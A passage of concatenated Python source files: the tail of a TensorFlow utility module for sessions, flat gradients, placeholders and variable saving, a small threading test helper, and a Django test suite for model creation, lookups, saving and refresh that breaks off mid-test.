list of outputs or a single output to be returned from function. Returned
value will also have the same shape.
"""
if isinstance(outputs, list):
return _Function(inputs, outputs, updates, givens=givens)
elif isinstance(outputs, (dict, collections.OrderedDict)):
f = _Function(inputs, outputs.values(), updates, givens=givens)
return lambda *args, **kwargs: type(outputs)(zip(outputs.keys(), f(*args, **kwargs)))
else:
f = _Function(inputs, [outputs], updates, givens=givens)
return lambda *args, **kwargs: f(*args, **kwargs)[0]
class _Function(object):
def __init__(self, inputs, outputs, updates, givens):
for inpt in inputs:
if not hasattr(inpt, 'make_feed_dict') and not (type(inpt) is tf.Tensor and len(inpt.op.inputs) == 0):
assert False, "inputs should all be placeholders, constants, or have a make_feed_dict method"
self.inputs = inputs
updates = updates or []
self.update_group = tf.group(*updates)
self.outputs_update = list(outputs) + [self.update_group]
self.givens = {} if givens is None else givens
def _feed_input(self, feed_dict, inpt, value):
if hasattr(inpt, 'make_feed_dict'):
feed_dict.update(inpt.make_feed_dict(value))
else:
feed_dict[inpt] = adjust_shape(inpt, value)
def __call__(self, *args):
assert len(args) <= len(self.inputs), "Too many arguments provided"
feed_dict = {}
# Update the args
for inpt, value in zip(self.inputs, args):
self._feed_input(feed_dict, inpt, value)
# Update feed dict with givens.
for inpt in self.givens:
feed_dict[inpt] = adjust_shape(inpt, feed_dict.get(inpt, self.givens[inpt]))
results = get_session().run(self.outputs_update, feed_dict=feed_dict)[:-1]
return results
# ================================================================
# Flat vectors
# ================================================================
def var_shape(x):
out = x.get_shape().as_list()
assert all(isinstance(a, int) for a in out), \
"shape function assumes that shape is fully known"
return out
def numel(x):
return intprod(var_shape(x))
def intprod(x):
return int(np.prod(x))
def flatgrad(loss, var_list, clip_norm=None):
grads = tf.gradients(loss, var_list)
if clip_norm is not None:
grads = [tf.clip_by_norm(grad, clip_norm=clip_norm) for grad in grads]
return tf.concat(axis=0, values=[
tf.reshape(grad if grad is not None else tf.zeros_like(v), [numel(v)])
for (v, grad) in zip(var_list, grads)
])
class SetFromFlat(object):
def __init__(self, var_list, dtype=tf.float32):
assigns = []
shapes = list(map(var_shape, var_list))
total_size = np.sum([intprod(shape) for shape in shapes])
self.theta = theta = tf.placeholder(dtype, [total_size])
start = 0
assigns = []
for (shape, v) in zip(shapes, var_list):
size = intprod(shape)
assigns.append(tf.assign(v, tf.reshape(theta[start:start + size], shape)))
start += size
self.op = tf.group(*assigns)
def __call__(self, theta):
tf.get_default_session().run(self.op, feed_dict={self.theta: theta})
class GetFlat(object):
def __init__(self, var_list):
self.op = tf.concat(axis=0, values=[tf.reshape(v, [numel(v)]) for v in var_list])
def __call__(self):
return tf.get_default_session().run(self.op)
def flattenallbut0(x):
return tf.reshape(x, [-1, intprod(x.get_shape().as_list()[1:])])
# =============================================================
# TF placeholders management
# ============================================================
_PLACEHOLDER_CACHE = {} # name -> (placeholder, dtype, shape)
def get_placeholder(name, dtype, shape):
if name in _PLACEHOLDER_CACHE:
out, dtype1, shape1 = _PLACEHOLDER_CACHE[name]
if out.graph == tf.get_default_graph():
assert dtype1 == dtype and shape1 == shape, \
'Placeholder with name {} has already been registered and has shape {}, different from requested {}'.format(
name, shape1, shape)
return out
out = tf.placeholder(dtype=dtype, shape=shape, name=name)
_PLACEHOLDER_CACHE[name] = (out, dtype, shape)
return out
def get_placeholder_cached(name):
return _PLACEHOLDER_CACHE[name][0]
# ================================================================
# Diagnostics
# ================================================================
def display_var_info(vars):
from baselines import logger
count_params = 0
for v in vars:
name = v.name
if "/Adam" in name or "beta1_power" in name or "beta2_power" in name: continue
v_params = np.prod(v.shape.as_list())
count_params += v_params
if "/b:" in name or "/biases" in name: continue # Wx+b, bias is not interesting to look at => count params, but not print
logger.info(" %s%s %i params %s" % (name, " " * (55 - len(name)), v_params, str(v.shape)))
logger.info("Total model parameters: %0.2f million" % (count_params * 1e-6))
def get_available_gpus():
# recipe from here:
# https://stackoverflow.com/questions/38559755/how-to-get-current-available-gpus-in-tensorflow?utm_medium=organic&utm_source=google_rich_qa&utm_campaign=google_rich_qa
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
return [x.name for x in local_device_protos if x.device_type == 'GPU']
# ================================================================
# Saving variables
# ================================================================
def load_state(fname, sess=None, vars=None):
from baselines import logger
logger.warn('load_state method is deprecated, please use load_variables instead')
sess = sess or get_session()
saver = tf.train.Saver(var_list=vars)
saver.restore(tf.get_default_session(), fname)
def save_state(fname, sess=None):
from baselines import logger
logger.warn('save_state method is deprecated, please use save_variables instead')
sess = sess or get_session()
dirname = os.path.dirname(fname)
if any(dirname):
os.makedirs(dirname, exist_ok=True)
saver = tf.train.Saver()
saver.save(tf.get_default_session(), fname)
# The methods above and below are clearly doing the same thing, and in a rather similar way
# TODO: ensure there is no subtle differences and remove one
def save_variables(save_path, variables=None, sess=None):
sess = sess or get_session()
variables = variables or tf.trainable_variables()
ps = sess.run(variables)
save_dict = {v.name: value for v, value in zip(variables, ps)}
dirname = os.path.dirname(save_path)
if any(dirname):
os.makedirs(dirname, exist_ok=True)
joblib.dump(save_dict, save_path)
def load_variables_parallel(load_path, variables=None, sess=None):
sess = sess or get_session()
variables = variables or tf.trainable_variables()
loaded_params = joblib.load(os.path.expanduser(load_path))
restores = []
for v in variables:
name = v.name.split('/')[1:]
restores.append(v.assign(loaded_params['/'.join(name)]))
sess.run(restores)
def load_variables(load_path, variables=None, sess=None, extra_vars=None):
sess = sess or get_session()
variables = variables or tf.trainable_variables()
loaded_params = joblib.load(os.path.expanduser(load_path))
if extra_vars is not None:
for k, v in extra_vars.items():
loaded_params[k] = v
restores = []
if isinstance(loaded_params, list):
assert len(loaded_params) == len(variables), 'number of variables loaded mismatches len(variables)'
for d, v in zip(loaded_params, variables):
restores.append(v.assign(d))
else:
for v in variables:
restores.append(v.assign(loaded_params[v.name]))
sess.run(restores)
# ================================================================
# Shape adjustment for feeding into tf placeholders
# ================================================================
def adjust_shape(placeholder, data):
'''
adjust shape of the data to the shape of the placeholder if possible.
If shape is incompatible, AssertionError is thrown
Parameters:
placeholder tensorflow input placeholder
data input data to be (potentially) reshaped to be fed into placeholder
Returns:
reshaped data
'''
if not isinstance(data, np.ndarray) and not isinstance(data, list):
return data
if isinstance(data, list):
data = np.array(data)
placeholder_shape = [x or -1 for x in placeholder.shape.as_list()]
assert _check_shape(placeholder_shape, data.shape), \
'Shape of data {} is not compatible with shape of the placeholder {}'.format(data.shape, placeholder_shape)
return np.reshape(data, placeholder_shape)
def _check_shape(placeholder_shape, data_shape):
''' check if two shapes are compatible (i.e. differ only by dimensions of size 1, or by the batch dimension)'''
return True
squeezed_placeholder_shape = _squeeze_shape(placeholder_shape)
squeezed_data_shape = _squeeze_shape(data_shape)
for i, s_data in enumerate(squeezed_data_shape):
s_placeholder = squeezed_placeholder_shape[i]
if s_placeholder != -1 and s_data != s_placeholder:
return False
return True
def _squeeze_shape(shape):
return [x for x in shape if x != 1]
# ================================================================
# Tensorboard interfacing
# ================================================================
def launch_tensorboard_in_background(log_dir):
'''
To log the Tensorflow graph when using rl-algs
algorithms, you can run the following code
in your main script:
import threading, time
def start_tensorboard(session):
time.sleep(10) # Wait until graph is setup
tb_path = osp.join(logger.get_dir(), 'tb')
summary_writer = tf.summary.FileWriter(tb_path, graph=session.graph)
summary_op = tf.summary.merge_all()
launch_tensorboard_in_background(tb_path)
session = tf.get_default_session()
t = threading.Thread(target=start_tensorboard, args=([session]))
t.start()
'''
import subprocess
subprocess.Popen(['tensorboard', '--logdir', log_dir])
|
util.py
|
from threading import Thread
class DummyException(Exception):
"""
A more specific error to call during the tests.
"""
def __init__(self, val=0):
self.val = val
def func_exception():
raise DummyException()
def func_succeed():
return True
async def func_succeed_async():
return True
async def func_exception_async():
raise DummyException()
def func_succeed_counted():
def func_succeed():
func_succeed.call_count += 1
return True
func_succeed.call_count = 0
return func_succeed
def func_succeed_counted_async():
async def func_succeed_async():
func_succeed_async.call_count += 1
return True
func_succeed_async.call_count = 0
return func_succeed_async
def start_threads(target_function, n):
"""
Starts `n` threads that calls the target function and waits for them to finish.
"""
threads = [Thread(target=target_function) for _ in range(n)]
for t in threads:
t.start()
for t in threads:
t.join()
|
tests.py
|
import threading
from datetime import datetime, timedelta
from unittest import mock
from django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist
from django.db import DEFAULT_DB_ALIAS, DatabaseError, connections, models
from django.db.models.manager import BaseManager
from django.db.models.query import MAX_GET_RESULTS, EmptyQuerySet, QuerySet
from django.test import (
SimpleTestCase, TestCase, TransactionTestCase, skipUnlessDBFeature,
)
from django.utils.translation import gettext_lazy
from .models import (
Article, ArticleSelectOnSave, FeaturedArticle, PrimaryKeyWithDefault,
SelfRef,
)
class ModelInstanceCreationTests(TestCase):
def test_object_is_not_written_to_database_until_save_was_called(self):
a = Article(
id=None,
headline='Parrot programs in Python',
pub_date=datetime(2005, 7, 28),
)
self.assertIsNone(a.id)
self.assertEqual(Article.objects.all().count(), 0)
# Save it into the database. You have to call save() explicitly.
a.save()
self.assertIsNotNone(a.id)
self.assertEqual(Article.objects.all().count(), 1)
def test_can_initialize_model_instance_using_positional_arguments(self):
"""
You can initialize a model instance using positional arguments,
which should match the field order as defined in the model.
"""
a = Article(None, 'Second article', datetime(2005, 7, 29))
a.save()
self.assertEqual(a.headline, 'Second article')
self.assertEqual(a.pub_date, datetime(2005, 7, 29, 0, 0))
def test_can_create_instance_using_kwargs(self):
a = Article(
id=None,
headline='Third article',
pub_date=datetime(2005, 7, 30),
)
a.save()
self.assertEqual(a.headline, 'Third article')
self.assertEqual(a.pub_date, datetime(2005, 7, 30, 0, 0))
def test_autofields_generate_different_values_for_each_instance(self):
a1 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
a2 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
a3 = Article.objects.create(headline='First', pub_date=datetime(2005, 7, 30, 0, 0))
self.assertNotEqual(a3.id, a1.id)
self.assertNotEqual(a3.id, a2.id)
def test_can_mix_and_match_position_and_kwargs(self):
# You can also mix and match position and keyword arguments, but
# be sure not to duplicate field information.
a = Article(None, 'Fourth article', pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Fourth article')
def test_cannot_create_instance_with_invalid_kwargs(self):
with self.assertRaisesMessage(TypeError, "Article() got an unexpected keyword argument 'foo'"):
Article(
id=None,
headline='Some headline',
pub_date=datetime(2005, 7, 31),
foo='bar',
)
def test_can_leave_off_value_for_autofield_and_it_gets_value_on_save(self):
"""
You can leave off the value for an AutoField when creating an
object, because it'll get filled in automatically when you save().
"""
a = Article(headline='Article 5', pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Article 5')
self.assertIsNotNone(a.id)
def test_leaving_off_a_field_with_default_set_the_default_will_be_saved(self):
a = Article(pub_date=datetime(2005, 7, 31))
a.save()
self.assertEqual(a.headline, 'Default headline')
def test_for_datetimefields_saves_as_much_precision_as_was_given(self):
"""as much precision in *seconds*"""
a1 = Article(
headline='Article 7',
pub_date=datetime(2005, 7, 31, 12, 30),
)
a1.save()
self.assertEqual(Article.objects.get(id__exact=a1.id).pub_date, datetime(2005, 7, 31, 12, 30))
a2 = Article(
headline='Article 8',
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a2.save()
self.assertEqual(Article.objects.get(id__exact=a2.id).pub_date, datetime(2005, 7, 31, 12, 30, 45))
def test_saving_an_object_again_does_not_create_a_new_object(self):
a = Article(headline='original', pub_date=datetime(2014, 5, 16))
a.save()
current_id = a.id
a.save()
self.assertEqual(a.id, current_id)
a.headline = 'Updated headline'
a.save()
self.assertEqual(a.id, current_id)
def test_querysets_checking_for_membership(self):
headlines = [
'Parrot programs in Python', 'Second article', 'Third article']
some_pub_date = datetime(2014, 5, 16, 12, 1)
for headline in headlines:
Article(headline=headline, pub_date=some_pub_date).save()
a = Article(headline='Some headline', pub_date=some_pub_date)
a.save()
# You can use 'in' to test for membership...
self.assertIn(a, Article.objects.all())
# ... but there will often be more efficient ways if that is all you need:
self.assertTrue(Article.objects.filter(id=a.id).exists())
def test_save_primary_with_default(self):
# An UPDATE attempt is skipped when a primary key has default.
with self.assertNumQueries(1):
PrimaryKeyWithDefault().save()
class ModelTest(TestCase):
def test_objects_attribute_is_only_available_on_the_class_itself(self):
with self.assertRaisesMessage(AttributeError, "Manager isn't accessible via Article instances"):
getattr(Article(), "objects",)
self.assertFalse(hasattr(Article(), 'objects'))
self.assertTrue(hasattr(Article, 'objects'))
def test_queryset_delete_removes_all_items_in_that_queryset(self):
headlines = [
'An article', 'Article One', 'Amazing article', 'Boring article']
some_pub_date = datetime(2014, 5, 16, 12, 1)
for headline in headlines:
Article(headline=headline, pub_date=some_pub_date).save()
self.assertQuerysetEqual(
Article.objects.all().order_by('headline'),
["<Article: Amazing article>",
"<Article: An article>",
"<Article: Article One>",
"<Article: Boring article>"]
)
Article.objects.filter(headline__startswith='A').delete()
self.assertQuerysetEqual(Article.objects.all().order_by('headline'), ["<Article: Boring article>"])
def test_not_equal_and_equal_operators_behave_as_expected_on_instances(self):
some_pub_date = datetime(2014, 5, 16, 12, 1)
a1 = Article.objects.create(headline='First', pub_date=some_pub_date)
a2 = Article.objects.create(headline='Second', pub_date=some_pub_date)
self.assertNotEqual(a1, a2)
self.assertEqual(a1, Article.objects.get(id__exact=a1.id))
self.assertNotEqual(Article.objects.get(id__exact=a1.id), Article.objects.get(id__exact=a2.id))
def test_microsecond_precision(self):
a9 = Article(
headline='Article 9',
pub_date=datetime(2005, 7, 31, 12, 30, 45, 180),
)
a9.save()
self.assertEqual(Article.objects.get(pk=a9.pk).pub_date, datetime(2005, 7, 31, 12, 30, 45, 180))
def test_manually_specify_primary_key(self):
# You can manually specify the primary key when creating a new object.
a101 = Article(
id=101,
headline='Article 101',
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a101.save()
a101 = Article.objects.get(pk=101)
self.assertEqual(a101.headline, 'Article 101')
def test_create_method(self):
# You can create saved objects in a single step
a10 = Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
self.assertEqual(Article.objects.get(headline="Article 10"), a10)
def test_year_lookup_edge_case(self):
# Edge-case test: A year lookup should retrieve all objects in
# the given year, including Jan. 1 and Dec. 31.
Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2008),
["<Article: Article 11>", "<Article: Article 12>"]
)
def test_unicode_data(self):
# Unicode data works, too.
a = Article(
headline='\u6797\u539f \u3081\u3050\u307f',
pub_date=datetime(2005, 7, 28),
)
a.save()
self.assertEqual(Article.objects.get(pk=a.id).headline, '\u6797\u539f \u3081\u3050\u307f')
def test_hash_function(self):
# Model instances have a hash function, so they can be used in sets
# or as dictionary keys. Two models compare as equal if their primary
# keys are equal.
a10 = Article.objects.create(
headline="Article 10",
pub_date=datetime(2005, 7, 31, 12, 30, 45),
)
a11 = Article.objects.create(
headline='Article 11',
pub_date=datetime(2008, 1, 1),
)
a12 = Article.objects.create(
headline='Article 12',
pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999),
)
s = {a10, a11, a12}
self.assertIn(Article.objects.get(headline='Article 11'), s)
def test_extra_method_select_argument_with_dashes_and_values(self):
# The 'select' argument to extra() supports names with dashes in
# them, as long as you use values().
Article.objects.bulk_create([
Article(headline='Article 10', pub_date=datetime(2005, 7, 31, 12, 30, 45)),
Article(headline='Article 11', pub_date=datetime(2008, 1, 1)),
Article(headline='Article 12', pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999)),
])
dicts = Article.objects.filter(
pub_date__year=2008).extra(
select={'dashed-value': '1'}).values('headline', 'dashed-value')
self.assertEqual(
[sorted(d.items()) for d in dicts],
[[('dashed-value', 1), ('headline', 'Article 11')], [('dashed-value', 1), ('headline', 'Article 12')]]
)
def test_extra_method_select_argument_with_dashes(self):
# If you use 'select' with extra() and names containing dashes on a
# query that's *not* a values() query, those extra 'select' values
# will silently be ignored.
Article.objects.bulk_create([
Article(headline='Article 10', pub_date=datetime(2005, 7, 31, 12, 30, 45)),
Article(headline='Article 11', pub_date=datetime(2008, 1, 1)),
Article(headline='Article 12', pub_date=datetime(2008, 12, 31, 23, 59, 59, 999999)),
])
articles = Article.objects.filter(
pub_date__year=2008).extra(select={'dashed-value': '1', 'undashedvalue': '2'})
self.assertEqual(articles[0].undashedvalue, 2)
def test_create_relation_with_gettext_lazy(self):
"""
gettext_lazy objects work when saving model instances
through various methods. Refs #10498.
"""
notlazy = 'test'
lazy = gettext_lazy(notlazy)
Article.objects.create(headline=lazy, pub_date=datetime.now())
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
# test that assign + save works with Promise objects
article.headline = lazy
article.save()
self.assertEqual(article.headline, notlazy)
# test .update()
Article.objects.update(headline=lazy)
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
# still test bulk_create()
Article.objects.all().delete()
Article.objects.bulk_create([Article(headline=lazy, pub_date=datetime.now())])
article = Article.objects.get()
self.assertEqual(article.headline, notlazy)
def test_emptyqs(self):
msg = "EmptyQuerySet can't be instantiated"
with self.assertRaisesMessage(TypeError, msg):
EmptyQuerySet()
self.assertIsInstance(Article.objects.none(), EmptyQuerySet)
self.assertNotIsInstance('', EmptyQuerySet)
def test_emptyqs_values(self):
# test for #15959
Article.objects.create(headline='foo', pub_date=datetime.now())
with self.assertNumQueries(0):
qs = Article.objects.none().values_list('pk')
self.assertIsInstance(qs, EmptyQuerySet)
self.assertEqual(len(qs), 0)
def test_emptyqs_customqs(self):
# A hacky test for custom QuerySet subclass - refs #17271
Article.objects.create(headline='foo', pub_date=datetime.now())
class CustomQuerySet(QuerySet):
def do_something(self):
return 'did something'
qs = Article.objects.all()
qs.__class__ = CustomQuerySet
qs = qs.none()
with self.assertNumQueries(0):
self.assertEqual(len(qs), 0)
self.assertIsInstance(qs, EmptyQuerySet)
self.assertEqual(qs.do_something(), 'did something')
def test_emptyqs_values_order(self):
# Tests for ticket #17712
Article.objects.create(headline='foo', pub_date=datetime.now())
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().values_list('id').order_by('id')), 0)
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().filter(
id__in=Article.objects.values_list('id', flat=True))), 0)
@skipUnlessDBFeature('can_distinct_on_fields')
def test_emptyqs_distinct(self):
# Tests for #19426
Article.objects.create(headline='foo', pub_date=datetime.now())
with self.assertNumQueries(0):
self.assertEqual(len(Article.objects.none().distinct('headline', 'pub_date')), 0)
def test_ticket_20278(self):
sr = SelfRef.objects.create()
with self.assertRaises(ObjectDoesNotExist):
SelfRef.objects.get(selfref=sr)
def test_eq(self):
self.assertEqual(Article(id=1), Article(id=1))
self.assertNotEqual(Article(id=1), object())
self.assertNotEqual(object(), Article(id=1))
a = Article()
self.assertEqual(a, a)
self.assertEqual(a, mock.ANY)
self.assertNotEqual(Article(), a)
def test_hash(self):
# Value based on PK
self.assertEqual(hash(Article(id=1)), hash(1))
msg = 'Model instances without primary key value are unhashable'
with self.assertRaisesMessage(TypeError, msg):
# No PK value -> unhashable (because save() would then change
# hash)
hash(Article())
def test_missing_hash_not_inherited(self):
class NoHash(models.Model):
def __eq__(self, other):
return super.__eq__(other)
with self.assertRaisesMessage(TypeError, "unhashable type: 'NoHash'"):
hash(NoHash(id=1))
def test_specified_parent_hash_inherited(self):
class ParentHash(models.Model):
def __eq__(self, other):
return super.__eq__(other)
__hash__ = models.Model.__hash__
self.assertEqual(hash(ParentHash(id=1)), 1)
def test_delete_and_access_field(self):
# Accessing a field after it's deleted from a model reloads its value.
pub_date = datetime.now()
article = Article.objects.create(headline='foo', pub_date=pub_date)
new_pub_date = article.pub_date + timedelta(days=10)
article.headline = 'bar'
article.pub_date = new_pub_date
del article.headline
with self.assertNumQueries(1):
self.assertEqual(article.headline, 'foo')
# Fields that weren't deleted aren't reloaded.
self.assertEqual(article.pub_date, new_pub_date)
def test_multiple_objects_max_num_fetched(self):
max_results = MAX_GET_RESULTS - 1
Article.objects.bulk_create(
Article(headline='Area %s' % i, pub_date=datetime(2005, 7, 28))
for i in range(max_results)
)
self.assertRaisesMessage(
MultipleObjectsReturned,
'get() returned more than one Article -- it returned %d!' % max_results,
Article.objects.get,
headline__startswith='Area',
)
Article.objects.create(headline='Area %s' % max_results, pub_date=datetime(2005, 7, 28))
self.assertRaisesMessage(
MultipleObjectsReturned,
'get() returned more than one Article -- it returned more than %d!' % max_results,
Article.objects.get,
headline__startswith='Area',
)
class ModelLookupTest(TestCase):
@classmethod
def setUpTestData(cls):
# Create an Article.
cls.a = Article(
id=None,
headline='Swallow programs in Python',
pub_date=datetime(2005, 7, 28),
)
# Save it into the database. You have to call save() explicitly.
cls.a.save()
def test_all_lookup(self):
# Change values by changing the attributes, then calling save().
self.a.headline = 'Parrot programs in Python'
self.a.save()
# Article.objects.all() returns all the articles in the database.
self.assertQuerysetEqual(Article.objects.all(), ['<Article: Parrot programs in Python>'])
def test_rich_lookup(self):
# Django provides a rich database lookup API.
self.assertEqual(Article.objects.get(id__exact=self.a.id), self.a)
self.assertEqual(Article.objects.get(headline__startswith='Swallow'), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7), self.a)
self.assertEqual(Article.objects.get(pub_date__year=2005, pub_date__month=7, pub_date__day=28), self.a)
self.assertEqual(Article.objects.get(pub_date__week_day=5), self.a)
def test_equal_lookup(self):
# The "__exact" lookup type can be omitted, as a shortcut.
self.assertEqual(Article.objects.get(id=self.a.id), self.a)
self.assertEqual(Article.objects.get(headline='Swallow programs in Python'), self.a)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2005),
['<Article: Swallow programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2004),
[],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__year=2005, pub_date__month=7),
['<Article: Swallow programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__week_day=5),
['<Article: Swallow programs in Python>'],
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__week_day=6),
[],
)
def test_does_not_exist(self):
# Django raises an Article.DoesNotExist exception for get() if the
# parameters don't match any object.
with self.assertRaisesMessage(ObjectDoesNotExist, "Article matching query does not exist."):
Article.objects.get(id__exact=2000,)
# To avoid dict-ordering related errors check only one lookup
# in single assert.
with self.assertRaises(ObjectDoesNotExist):
Article.objects.get(pub_date__year=2005, pub_date__month=8)
with self.assertRaisesMessage(ObjectDoesNotExist, "Article matching query does not exist."):
Article.objects.get(pub_date__week_day=6,)
def test_lookup_by_primary_key(self):
# Lookup by a primary key is the most common case, so Django
# provides a shortcut for primary-key exact lookups.
# The following is identical to articles.get(id=a.id).
self.assertEqual(Article.objects.get(pk=self.a.id), self.a)
# pk can be used as a shortcut for the primary key name in any query.
self.assertQuerysetEqual(Article.objects.filter(pk__in=[self.a.id]), ["<Article: Swallow programs in Python>"])
# Model instances of the same type and same ID are considered equal.
a = Article.objects.get(pk=self.a.id)
b = Article.objects.get(pk=self.a.id)
self.assertEqual(a, b)
def test_too_many(self):
# Create a very similar object
a = Article(
id=None,
headline='Swallow bites Python',
pub_date=datetime(2005, 7, 28),
)
a.save()
self.assertEqual(Article.objects.count(), 2)
# Django raises an Article.MultipleObjectsReturned exception if the
# lookup matches more than one object
msg = "get() returned more than one Article -- it returned 2!"
with self.assertRaisesMessage(MultipleObjectsReturned, msg):
Article.objects.get(headline__startswith='Swallow',)
with self.assertRaisesMessage(MultipleObjectsReturned, msg):
Article.objects.get(pub_date__year=2005,)
with self.assertRaisesMessage(MultipleObjectsReturned, msg):
Article.objects.get(pub_date__year=2005, pub_date__month=7)
class ConcurrentSaveTests(TransactionTestCase):
available_apps = ['basic']
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_concurrent_delete_with_save(self):
"""
Test fetching, deleting and finally saving an object - we should get
an insert in this case.
"""
a = Article.objects.create(headline='foo', pub_date=datetime.now())
exceptions = []
def deleter():
try:
# Do not delete a directly - doing so alters its state.
Article.objects.filter(pk=a.pk).delete()
except Exception as e:
exceptions.append(e)
finally:
connections[DEFAULT_DB_ALIAS].close()
self.assertEqual(len(exceptions), 0)
t = threading.Thread(target=deleter)
t.start()
t.join()
a.save()
self.assertEqual(Article.objects.get(pk=a.pk).headline, 'foo')
class ManagerTest(SimpleTestCase):
QUERYSET_PROXY_METHODS = [
'none',
'count',
'dates',
'datetimes',
'distinct',
'extra',
'get',
'get_or_create',
'update_or_create',
'create',
'bulk_create',
'bulk_update',
'filter',
'aggregate',
'annotate',
'complex_filter',
'exclude',
'in_bulk',
'iterator',
'earliest',
'latest',
'first',
'last',
'order_by',
'select_for_update',
'select_related',
'prefetch_related',
'values',
'values_list',
'update',
'reverse',
'defer',
'only',
'using',
'exists',
'explain',
'_insert',
'_update',
'raw',
'union',
'intersection',
'difference',
]
def test_manager_methods(self):
"""
This test ensures that the correct set of methods from `QuerySet`
are copied onto `Manager`.
It's particularly useful to prevent accidentally leaking new methods
into `Manager`. New `QuerySet` methods that should also be copied onto
`Manager` will need to be added to `ManagerTest.QUERYSET_PROXY_METHODS`.
"""
self.assertEqual(
sorted(BaseManager._get_queryset_methods(QuerySet)),
sorted(self.QUERYSET_PROXY_METHODS),
)
class SelectOnSaveTests(TestCase):
def test_select_on_save(self):
a1 = Article.objects.create(pub_date=datetime.now())
with self.assertNumQueries(1):
a1.save()
asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now())
with self.assertNumQueries(2):
asos.save()
with self.assertNumQueries(1):
asos.save(force_update=True)
Article.objects.all().delete()
with self.assertRaisesMessage(DatabaseError, 'Forced update did not affect any rows.'):
with self.assertNumQueries(1):
asos.save(force_update=True)
def test_select_on_save_lying_update(self):
"""
select_on_save works correctly if the database doesn't return correct
information about matched rows from UPDATE.
"""
# Change the manager to not return "row matched" for update().
# We are going to change the Article's _base_manager class
# dynamically. This is a bit of a hack, but it seems hard to
# test this properly otherwise. Article's manager, because
# proxy models use their parent model's _base_manager.
orig_class = Article._base_manager._queryset_class
class FakeQuerySet(QuerySet):
# Make sure the _update method below is in fact called.
called = False
def _update(self, *args, **kwargs):
FakeQuerySet.called = True
super()._update(*args, **kwargs)
return 0
try:
Article._base_manager._queryset_class = FakeQuerySet
asos = ArticleSelectOnSave.objects.create(pub_date=datetime.now())
with self.assertNumQueries(3):
asos.save()
self.assertTrue(FakeQuerySet.called)
# This is not wanted behavior, but this is how Django has always
# behaved for databases that do not return correct information
# about matched rows for UPDATE.
with self.assertRaisesMessage(DatabaseError, 'Forced update did not affect any rows.'):
asos.save(force_update=True)
msg = (
"An error occurred in the current transaction. You can't "
"execute queries until the end of the 'atomic' block."
)
with self.assertRaisesMessage(DatabaseError, msg):
asos.save(update_fields=['pub_date'])
finally:
Article._base_manager._queryset_class = orig_class
class ModelRefreshTests(TestCase):
def test_refresh(self):
a = Article.objects.create(pub_date=datetime.now())
Article.objects.create(pub_date=datetime.now())
Article.objects.filter(pk=a.pk).update(headline='new headline')
with self.assertNumQueries(1):
a.refresh_from_db()
self.assertEqual(a.headline, 'new headline')
orig_pub_date = a.pub_date
new_pub_date = a.pub_date + timedelta(10)
Article.objects.update(headline='new headline 2', pub_date=new_pub_date)
with self.assertNumQueries(1):
a.refresh_from_db(fields=['headline'])
self.assertEqual(a.headline, 'new headline 2')
self.assertEqual(a.pub_date, orig_pub_date)
with self.assertNumQueries(1):
a.refresh_from_db()
self.assertEqual(a.pub_date, new_pub_date)
def test_unknown_kwarg(self):
s = SelfRef.objects.create()
msg = "refresh_from_db() got an unexpected keyword argument 'unknown_kwarg'"
with self.assertRaisesMessage(TypeError, msg):
s.refresh_from_db(unknown_kwarg=10)
def test_lookup_in_fields(self):
s = SelfRef.objects.create()
msg = 'Found "__" in fields argument. Relations and transforms are not allowed in fields.'
with self.assertRaisesMessage(ValueError, msg):
s.refresh_from_db(fields=['foo__bar'])
def test_refresh_fk(self):
s1 = SelfRef.objects.create()
s2 = SelfRef.objects.create()
s3 = SelfRef.objects.create(selfref=s1)
s3_copy = SelfRef.objects.get(pk=s3.pk)
s3_copy.selfref.touched = True
s3.selfref = s2
s3.save()
with self.assertNumQueries(1):
s3_copy.refresh_from_db()
with self.assertNumQueries(1):
# The old related instance was thrown away (the selfref_id has
# changed). It needs to be reloaded on access, so one query
# executed.
self.assertFalse(hasattr(s3_copy.selfref, 'touched'))
self.assertEqual(s3_copy.selfref, s2)
def test_refresh_null_fk(self):
s1 = SelfRef.objects.create()
s2 = SelfRef.objects.create(selfref=s1)
s2.selfref = None
s2.refresh_from_db()
self.assertEqual(s2.selfref, s1)
def test_refresh_unsaved(self):
pub_date = datetime.now()
a = Article.objects.create(pub_date=pub_date)
a2 = Article(id=a.pk)
with self.assertNumQueries(1):
a2.refresh_from_db()
self.assertEqual(a2.pub_date, pub_date)
self.assertEqual(a2._state.db, "default")
def test_refresh_fk_on_delete_set_null(self):
a = Article.objects.create(
headline='Parrot programs in Python',
pub_date=datetime(2005, 7, 28),
)
s1 = SelfRef.objects.create(article=a)
a.delete()
s1.refresh_from_db()
self.assertIsNone(s1.article_id)
self.assertIsNone(s1.article)
def test_refresh_no_fields(self):
a = Article.objects.create(pub_date=datetime.now())
with self.assertNumQueries(0):
a.refresh_from_db(fields=[])
def test_refresh_clears_reverse_related(self):
"""refresh_from_db() clear cached reverse relations."""
article = Article.objects.create(
headline='Parrot programs in Python',
